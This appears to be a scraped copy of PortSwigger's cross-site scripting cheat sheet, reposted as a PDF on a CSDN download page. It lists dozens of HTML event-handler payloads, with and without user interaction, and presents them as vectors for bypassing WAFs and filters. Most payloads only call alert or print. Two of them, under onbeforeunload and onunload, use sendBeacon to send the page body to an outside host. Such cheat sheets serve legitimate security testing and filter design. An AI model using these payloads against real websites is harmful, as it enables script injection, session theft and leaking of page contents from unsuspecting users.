xsspayload.pdf资源-CSDN文库

需积分: 5 178 浏览量 2024-10-27 11:23:58 上传评论收藏 22.74MB PDF 举报

资源推荐

资源详情

资源评论

Cross-site scripting (XSS) cheat sheet
This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or
browser and a proof of concept is included for every vector.
This is a PortSwigger Research project. Follow us on Twitter to receive updates.
This cheat sheet is regularly updated in 2024. Last updated: Tue, 11 Jun 2024 07:19:21 +0000.
Table of contents
Event handlers
Search Type:   Search term:   
Event handlers that do not require user interaction
Event: Description: Code:
onafterscriptexecute
Fires after script is executed
<xss onafterscriptexecute=alert(1)><script>1</script>Compatibility:
onanimationcancel
Fires when a CSS animation cancels
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target
{animation:10s ease-in-out 0s 1 x;}</style><xss id=x
style="position:absolute;" onanimationcancel="print()"></xss>
Compatibility:
onanimationend
Fires when a CSS animation ends
<style>@keyframes x{}</style><xss style="animation-name:x"
onanimationend="alert(1)"></xss>
Compatibility:
onanimationiteration
Fires when a CSS animation repeats
<style>@keyframes slidein {}</style><xss style="animation-
duration:1s;animation-name:slidein;animation-iteration-count:2"
onanimationiteration="alert(1)"></xss>
Compatibility:
onanimationstart
Fires when a CSS animation starts
<style>@keyframes x{}</style><xss style="animation-name:x"
onanimationstart="alert(1)"></xss>
Compatibility:
onbeforeprint
Fires before the page is printed
<body onbeforeprint=console.log(1)>Compatibility:
onbeforescriptexecute
Fires before script is executed
<xss onbeforescriptexecute=alert(1)><script>1</script>Compatibility:
onbeforeunload
Fires after if the url changes
<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-
labs.net/',document.body.innerHTML)>
Compatibility:
onbegin
Fires when a svg animation begins
<svg><animate onbegin=alert(1) attributeName=x dur=1s>Compatibility:
oncanplay
Fires if the resource can be played
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav">
</audio>
Compatibility:

Fires when the page is shown
<body onpageshow=alert(1)>Compatibility:
onplay
Fires when the resource is played
<audio autoplay onplay=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>
Compatibility:
onplaying
Fires the resource is playing
<audio autoplay onplaying=alert(1)><source src="validaudio.wav"
type="audio/wav"></audio>
Compatibility:
onpopstate
Fires when the history changes
<body onpopstate=print()>Compatibility:
onprogress
Fires when the video/audio begins
downloading
<audio controls onprogress=alert(1)><source src=validaudio.mp3
type=audio/mpeg></audio>
Compatibility:
onrepeat
Fires when a svg animation repeats
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />Compatibility:
onresize
Fires when the window is resized
<body onresize="print()">Compatibility:
onscroll
Fires when the page scrolls
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>Compatibility:
onscrollend
Fires when the scrolling to the end of the
element
<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px
dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><span id=x>test</span></xss>
Compatibility:
onsuspend
Fires when the video/audio when the data
loading is suspended
<audio controls onsuspend=alert(1)><source src=validaudio.mp3
type=audio/mpeg></audio>
Compatibility:
ontimeupdate
Fires when the timeline is changed
<audio controls autoplay ontimeupdate=alert(1)><source
src="validaudio.wav" type="audio/wav"></audio>
Compatibility:
ontoggle
Fires when the details tag is expanded
<details ontoggle=alert(1) open>test</details>Compatibility:
ontransitioncancel
Fires when a CSS transition cancels
<style>:target {color: red;}</style><xss id=x style="transition:color 10s"
ontransitioncancel=print()></xss>
Compatibility:
ontransitionend
Fires when a CSS transition ends
<xss id=x style="transition:outline 1s" ontransitionend=alert(1)
tabindex=1></xss>
Compatibility:
ontransitionrun
Fires when a CSS transition begins
<style>:target {transform: rotate(180deg);}</style><xss id=x
style="transition:transform 2s" ontransitionrun=print()></xss>
Compatibility:
ontransitionstart
Fires when a CSS transition starts
<style>:target {color:red;}</style><xss id=x style="transition:color 1s"
ontransitionstart=alert(1)></xss>
Compatibility:

onunhandledrejection
Fires when a promise isn't handled
<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>Compatibility:
onunload
Fires when the page is unloaded
<body onunload=navigator.sendBeacon('//https://ssl.portswigger-
labs.net/',document.body.innerHTML)>
Compatibility:
onwebkitanimationend
Fires when a CSS animation ends
<style>@keyframes x{}</style><xss style="animation-name:x"
onwebkitanimationend="alert(1)"></xss>
Compatibility:
onwebkitanimationiteration
Fires when a CSS animation repeats
<style>@keyframes slidein {}</style><xss style="animation-
duration:1s;animation-name:slidein;animation-iteration-count:2"
onwebkitanimationiteration="alert(1)"></xss>
Compatibility:
onwebkitanimationstart
Fires when a CSS animation starts
<style>@keyframes x{}</style><xss style="animation-name:x"
onwebkitanimationstart="alert(1)"></xss>
Compatibility:
onwebkitplaybacktargetavailabilitychanged
Fires when the availability of an AirPlay
playback target changes
<audio onwebkitplaybacktargetavailabilitychanged=alert(1)>Compatibility:
onwebkittransitionend
Fires when a CSS transition ends
<style>:target {color:red;}</style><xss id=x style="transition:color 1s"
onwebkittransitionend=alert(1)></xss>
Compatibility:
Event handlers that do require user interaction
Event: Description: Code:
onafterprint
Fires after the page is printed
<body onafterprint=alert(1)>Compatibility:
onauxclick
Fires when right clicking or using the
middle button of the mouse
<input onauxclick=alert(1)>Compatibility:
onbeforecopy
Requires you copy a piece of text
<a onbeforecopy="alert(1)" contenteditable>test</a>Compatibility:
onbeforecut
Requires you cut a piece of text
<a onbeforecut="alert(1)" contenteditable>test</a>Compatibility:
onbeforeinput
Fires when the value of the element is
about to be modified
<xss contenteditable onbeforeinput=alert(1)>testCompatibility:
onbeforetoggle
Fires before the a popop element is
toggled
<button popovertarget=x>Click me</button><xss onbeforetoggle=alert(1)
popover id=x>XSS</xss>
Compatibility:
onblur
Fires when an element loses focus
<xss onblur=alert(1) id=x tabindex=1 style=display:block>test</xss><input
value=clickme>
Compatibility:
onchange

Requires as change of value
<input onchange=alert(1) value=xss>Compatibility:
onclick
Requires a click of the element
<xss onclick="alert(1)" style=display:block>test</xss>Compatibility:
onclose
Fires when a dialog is closed
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button>
</form>
Compatibility:
oncontextmenu
Triggered when right clicking to show the
context menu
<xss oncontextmenu="alert(1)" style=display:block>test</xss>Compatibility:
oncopy
Requires you copy a piece of text
<xss oncopy=alert(1) value="XSS" autofocus tabindex=1
style=display:block>test
Compatibility:
oncut
Requires you cut a piece of text
<xss oncut=alert(1) value="XSS" autofocus tabindex=1
style=display:block>test
Compatibility:
ondblclick
Triggered when double clicking the
element
<xss ondblclick="alert(1)" autofocus tabindex=1
style=display:block>test</xss>
Compatibility:
ondrag
Triggered dragging the element
<xss draggable="true" ondrag="alert(1)" style=display:block>test</xss>Compatibility:
ondragend
Triggered dragging is finished on the
element
<xss draggable="true" ondragend="alert(1)" style=display:block>test</xss>Compatibility:
ondragenter
Requires a mouse drag
<xss draggable="true" ondragenter="alert(1)"
style=display:block>test</xss>
Compatibility:
ondragexit
Triggered when dragging the element
<xss draggable="true" ondragexit="alert(1)" style=display:block>test</xss>Compatibility:
ondragleave
Requires a mouse drag
<xss draggable="true" ondragleave="alert(1)"
style=display:block>test</xss>
Compatibility:
ondragover
Triggered dragging over an element
<div draggable="true" contenteditable>drag me</div><xss
ondragover=alert(1) contenteditable style=display:block>drop here</xss>
Compatibility:
ondragstart
Requires a mouse drag
<xss draggable="true" ondragstart="alert(1)"
style=display:block>test</xss>
Compatibility:
ondrop
Triggered dropping a draggable element
<div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1)
contenteditable style=display:block>drop here</xss>
Compatibility:
onfocusout
Fires when an element loses focus
<xss onfocusout=alert(1) autofocus tabindex=1
style=display:block>test</xss><input value=clickme>
Compatibility: